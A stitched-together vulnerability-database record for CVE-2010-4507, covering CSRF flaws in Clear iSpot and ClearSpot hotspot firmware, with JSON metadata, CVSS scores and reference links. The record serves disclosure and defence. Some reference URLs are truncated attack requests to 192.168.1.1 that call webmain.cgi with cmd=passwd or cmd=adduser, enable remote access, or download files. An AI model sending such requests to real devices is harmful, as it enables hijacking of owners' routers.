"db": "JVNDB",
"id": "JVNDB-2010-003488"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-47112"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-003488"
},
{
"db": "NVD",
"id": "CVE-2010-4507"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "https://www.trustwave.com/spiderlabs/advisories/twsl2010-008.txt"
},
{
"trust": 1.7,
"url": "http://www.exploit-db.com/exploits/15728/"
},
{
"trust": 1.1,
"url": "http://secunia.com/advisories/42590"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-4507"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2010-4507"
},
{
"trust": 0.3,
"url": "http://www.clear.com/devices"
},
{
"trust": 0.3,
"url": "/archive/1/515178"
},
{
"trust": 0.1,
"url": "http://secunia.com/products/corporate/evm/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/42590/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/products/corporate/vim/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/42590/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=42590"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/"
},
{
"trust": 0.1,
"url": "http://infomark.co.kr/\u003e)"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-4507"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/cgi-bin/webmain.cgi?act=act_cmd_result\u0026cmd=passwd%2"
},
{
"trust": 0.1,
"url": "http://www.clear.com"
},
{
"trust": 0.1,
"url": "http://www.clear.com/\u003e)"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/cgi-bin/webmain.cgi?act=act_network_set\u0026add_enable="
},
{
"trust": 0.1,
"url": "http://192.168.1.1/cgi-bin/upgrademain.cgi?act=act_file_download\u0026metho"
},
{
"trust": 0.1,
"url": "http://lists.grok.org.uk/full-disclosure-charter.html"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/cgi-bin/webmain.cgi?act=act_cmd_result\u0026cmd=adduser%"
},
{
"trust": 0.1,
"url": "https://www.trustwave.com/\u003e"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/cgi-bin/webmain.cgi?act=act_set_wimax_etc_config\u0026en"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/cgi-bin/webmain.cgi\""
},
{
"trust": 0.1,
"url": "https://www.trustwave.com"
},
{
"trust": 0.1,
"url": "http://infomark.co.kr"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/cgi-bin/webmain.cgi%22\u003e\u003e"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/cgi-bin/webmain.cgi?act=act_network_set\u0026enable_remo"
},
{
"trust": 0.1,
"url": "https://www.trustwave.com/spiderlabs"
},
{
"trust": 0.1,
"url": "http://www.clear.com/devices)"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/cgi-bin/upgrademain.cgi\u003e"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/cgi-bin/upgrademain.cgi"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-47112"
},
{
"db": "BID",
"id": "45373"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-003488"
},
{
"db": "PACKETSTORM",
"id": "97035"
},
{
"db": "PACKETSTORM",
"id": "96629"
},
{
"db": "NVD",
"id": "CVE-2010-4507"
},
{
"db": "CNNVD",
"id": "CNNVD-201012-370"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-47112"
},
{
"db": "BID",
"id": "45373"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-003488"
},
{
"db": "PACKETSTORM",
"id": "97035"
},
{
"db": "PACKETSTORM",
"id": "96629"
},
{
"db": "NVD",
"id": "CVE-2010-4507"
},
{
"db": "CNNVD",
"id": "CNNVD-201012-370"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-12-30T00:00:00",
"db": "VULHUB",
"id": "VHN-47112"
},
{
"date": "2010-12-10T00:00:00",
"db": "BID",
"id": "45373"
},
{
"date": "2012-03-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2010-003488"
},
{
"date": "2010-12-26T07:30:32",
"db": "PACKETSTORM",
"id": "97035"
},
{
"date": "2010-12-11T16:29:50",
"db": "PACKETSTORM",
"id": "96629"
},
{
"date": "2010-12-30T19:00:05.457000",
"db": "NVD",
"id": "CVE-2010-4507"
},
{
"date": "2010-12-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201012-370"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-01-12T00:00:00",
"db": "VULHUB",
"id": "VHN-47112"
},
{
"date": "2011-05-09T14:52:00",
"db": "BID",
"id": "45373"
},
{
"date": "2012-03-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2010-003488"
},
{
"date": "2011-01-12T05:00:00",
"db": "NVD",
"id": "CVE-2010-4507"
},
{
"date": "2011-01-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201012-370"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201012-370"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ClearSpot of iSpot Cross-site request forgery vulnerability in administrator authentication",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2010-003488"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201012-370"
}
],
"trust": 0.6
}
}
FKIE_CVE-2010-4507
Vulnerability from fkie_nvd - Published: 2010-12-30 19:00 - Updated: 2025-04-11 00:51
Severity ?
Summary
Multiple cross-site request forgery (CSRF) vulnerabilities on the iSpot 2.0.0.0 R1679, and the ClearSpot 2.0.0.0 R1512 and R1786, with firmware 1.9.9.4 allow remote attackers to hijack the authentication of administrators for requests that (1) execute arbitrary commands via the cmd parameter in an act_cmd_result action to webmain.cgi, (2) enable remote management via an enable_remote_access act_network_set action to webmain.cgi, (3) enable the TELNET service via an ENABLE_TELNET act_set_wimax_etc_config action to webmain.cgi, (4) enable TELNET sessions via a certain act_network_set action to webmain.cgi, or (5) read arbitrary files via the FILE_PATH parameter in an act_file_download action to upgrademain.cgi.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| clear | ispot_firmware | 1.9.9.4 | |
| clear | ispot | 2.0.0.0 | |
| clear | clearspot_firmware | 1.9.9.4 | |
| clear | clearspot | 2.0.0.0 | |
| clear | clearspot | 2.0.0.0 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:clear:ispot_firmware:1.9.9.4:*:*:*:*:*:*:*",
"matchCriteriaId": "18AEED9D-F7C0-4C14-BDC7-3E144DEBDB9F",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:clear:ispot:2.0.0.0:r1679:*:*:*:*:*:*",
"matchCriteriaId": "CC710D6D-20E9-469B-A3D5-E5942D7FE299",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:clear:clearspot_firmware:1.9.9.4:*:*:*:*:*:*:*",
"matchCriteriaId": "70383CFF-6605-47D5-B7DC-8BB172185C7B",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:clear:clearspot:2.0.0.0:r1512:*:*:*:*:*:*",
"matchCriteriaId": "2D1B3013-ACA9-4976-BF2A-65B1FB2817AF",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:clear:clearspot:2.0.0.0:r1786:*:*:*:*:*:*",
"matchCriteriaId": "7E7E21CE-F424-4A9B-A9F7-99A85D34B76C",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site request forgery (CSRF) vulnerabilities on the iSpot 2.0.0.0 R1679, and the ClearSpot 2.0.0.0 R1512 and R1786, with firmware 1.9.9.4 allow remote attackers to hijack the authentication of administrators for requests that (1) execute arbitrary commands via the cmd parameter in an act_cmd_result action to webmain.cgi, (2) enable remote management via an enable_remote_access act_network_set action to webmain.cgi, (3) enable the TELNET service via an ENABLE_TELNET act_set_wimax_etc_config action to webmain.cgi, (4) enable TELNET sessions via a certain act_network_set action to webmain.cgi, or (5) read arbitrary files via the FILE_PATH parameter in an act_file_download action to upgrademain.cgi."
},
{
"lang": "es",
"value": "M\u00faltiples vulnerabilidades de falsificaci\u00f3n de petici\u00f3n en sitios cruzados (CSRF) en iSpot v2.0.0.0 R1679, y el ClearSpot v2.0.0.0 R1512 y R1786, con firmware v1.9.9.4, permite a atacantes remotos secuestrar la autenticaci\u00f3n de los usuarios por peticiones que (1) ejecuten comandos de su elecci\u00f3n a trav\u00e9s del par\u00e1metro cmd en una acci\u00f3n act_cmd_result sobre webmain.cgi, (2) permitir la gesti\u00f3n remota a trav\u00e9s de una acci\u00f3n enable_remote_access act_network_set sobre webmain.cgi, (3) permitir el servicio TELNET a trav\u00e9s de una acci\u00f3n ENABLE_TELNET act_set_wimax_etc_config sobre webmain.cgi, (4) disponer sesiones TELNET a trav\u00e9s de ciertas acciones act_network_set sobre webmain.cgi, o (5) leer ficheros de su elecci\u00f3n a trav\u00e9s del par\u00e1metro FILE_PATH en una acci\u00f3n act_file_download sobre upgrademain.cgi."
}
],
"id": "CVE-2010-4507",
"lastModified": "2025-04-11T00:51:21.963",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 10.0,
"obtainAllPrivilege": true,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2010-12-30T19:00:05.457",
"references": [
{
"source": "cve@mitre.org",
"url": "http://secunia.com/advisories/42590"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://www.exploit-db.com/exploits/15728/"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2010-008.txt"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://secunia.com/advisories/42590"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://www.exploit-db.com/exploits/15728/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2010-008.txt"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-352"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
CVE-2010-4507 (GCVE-0-2010-4507)
Vulnerability from cvelistv5 – Published: 2010-12-30 18:00 – Updated: 2024-08-07 03:51
VLAI?
Summary
Multiple cross-site request forgery (CSRF) vulnerabilities on the iSpot 2.0.0.0 R1679, and the ClearSpot 2.0.0.0 R1512 and R1786, with firmware 1.9.9.4 allow remote attackers to hijack the authentication of administrators for requests that (1) execute arbitrary commands via the cmd parameter in an act_cmd_result action to webmain.cgi, (2) enable remote management via an enable_remote_access act_network_set action to webmain.cgi, (3) enable the TELNET service via an ENABLE_TELNET act_set_wimax_etc_config action to webmain.cgi, (4) enable TELNET sessions via a certain act_network_set action to webmain.cgi, or (5) read arbitrary files via the FILE_PATH parameter in an act_file_download action to upgrademain.cgi.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T03:51:16.965Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "15728",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "http://www.exploit-db.com/exploits/15728/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2010-008.txt"
},
{
"name": "42590",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/42590"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2010-12-10T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site request forgery (CSRF) vulnerabilities on the iSpot 2.0.0.0 R1679, and the ClearSpot 2.0.0.0 R1512 and R1786, with firmware 1.9.9.4 allow remote attackers to hijack the authentication of administrators for requests that (1) execute arbitrary commands via the cmd parameter in an act_cmd_result action to webmain.cgi, (2) enable remote management via an enable_remote_access act_network_set action to webmain.cgi, (3) enable the TELNET service via an ENABLE_TELNET act_set_wimax_etc_config action to webmain.cgi, (4) enable TELNET sessions via a certain act_network_set action to webmain.cgi, or (5) read arbitrary files via the FILE_PATH parameter in an act_file_download action to upgrademain.cgi."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2011-01-12T10:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "15728",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "http://www.exploit-db.com/exploits/15728/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2010-008.txt"
},
{
"name": "42590",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/42590"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2010-4507",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple cross-site request forgery (CSRF) vulnerabilities on the iSpot 2.0.0.0 R1679, and the ClearSpot 2.0.0.0 R1512 and R1786, with firmware 1.9.9.4 allow remote attackers to hijack the authentication of administrators for requests that (1) execute arbitrary commands via the cmd parameter in an act_cmd_result action to webmain.cgi, (2) enable remote management via an enable_remote_access act_network_set action to webmain.cgi, (3) enable the TELNET service via an ENABLE_TELNET act_set_wimax_etc_config action to webmain.cgi, (4) enable TELNET sessions via a certain act_network_set action to webmain.cgi, or (5) read arbitrary files via the FILE_PATH parameter in an act_file_download action to upgrademain.cgi."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "15728",
"refsource": "EXPLOIT-DB",
"url": "http://www.exploit-db.com/exploits/15728/"
},
{
"name": "https://www.trustwave.com/spiderlabs/advisories/TWSL2010-008.txt",
"refsource": "MISC",
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2010-008.txt"
},
{
"name": "42590",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/42590"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2010-4507",
"datePublished": "2010-12-30T18:00:00",
"dateReserved": "2010-12-08T00:00:00",
"dateUpdated": "2024-08-07T03:51:16.965Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2010-4507 (GCVE-0-2010-4507)
Vulnerability from nvd – Published: 2010-12-30 18:00 – Updated: 2024-08-07 03:51
VLAI?
Summary
Multiple cross-site request forgery (CSRF) vulnerabilities on the iSpot 2.0.0.0 R1679, and the ClearSpot 2.0.0.0 R1512 and R1786, with firmware 1.9.9.4 allow remote attackers to hijack the authentication of administrators for requests that (1) execute arbitrary commands via the cmd parameter in an act_cmd_result action to webmain.cgi, (2) enable remote management via an enable_remote_access act_network_set action to webmain.cgi, (3) enable the TELNET service via an ENABLE_TELNET act_set_wimax_etc_config action to webmain.cgi, (4) enable TELNET sessions via a certain act_network_set action to webmain.cgi, or (5) read arbitrary files via the FILE_PATH parameter in an act_file_download action to upgrademain.cgi.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T03:51:16.965Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "15728",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "http://www.exploit-db.com/exploits/15728/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2010-008.txt"
},
{
"name": "42590",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/42590"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2010-12-10T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site request forgery (CSRF) vulnerabilities on the iSpot 2.0.0.0 R1679, and the ClearSpot 2.0.0.0 R1512 and R1786, with firmware 1.9.9.4 allow remote attackers to hijack the authentication of administrators for requests that (1) execute arbitrary commands via the cmd parameter in an act_cmd_result action to webmain.cgi, (2) enable remote management via an enable_remote_access act_network_set action to webmain.cgi, (3) enable the TELNET service via an ENABLE_TELNET act_set_wimax_etc_config action to webmain.cgi, (4) enable TELNET sessions via a certain act_network_set action to webmain.cgi, or (5) read arbitrary files via the FILE_PATH parameter in an act_file_download action to upgrademain.cgi."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2011-01-12T10:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "15728",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "http://www.exploit-db.com/exploits/15728/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2010-008.txt"
},
{
"name": "42590",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/42590"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2010-4507",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple cross-site request forgery (CSRF) vulnerabilities on the iSpot 2.0.0.0 R1679, and the ClearSpot 2.0.0.0 R1512 and R1786, with firmware 1.9.9.4 allow remote attackers to hijack the authentication of administrators for requests that (1) execute arbitrary commands via the cmd parameter in an act_cmd_result action to webmain.cgi, (2) enable remote management via an enable_remote_access act_network_set action to webmain.cgi, (3) enable the TELNET service via an ENABLE_TELNET act_set_wimax_etc_config action to webmain.cgi, (4) enable TELNET sessions via a certain act_network_set action to webmain.cgi, or (5) read arbitrary files via the FILE_PATH parameter in an act_file_download action to upgrademain.cgi."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "15728",
"refsource": "EXPLOIT-DB",
"url": "http://www.exploit-db.com/exploits/15728/"
},
{
"name": "https://www.trustwave.com/spiderlabs/advisories/TWSL2010-008.txt",
"refsource": "MISC",
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2010-008.txt"
},
{
"name": "42590",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/42590"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2010-4507",
"datePublished": "2010-12-30T18:00:00",
"dateReserved": "2010-12-08T00:00:00",
"dateUpdated": "2024-08-07T03:51:16.965Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}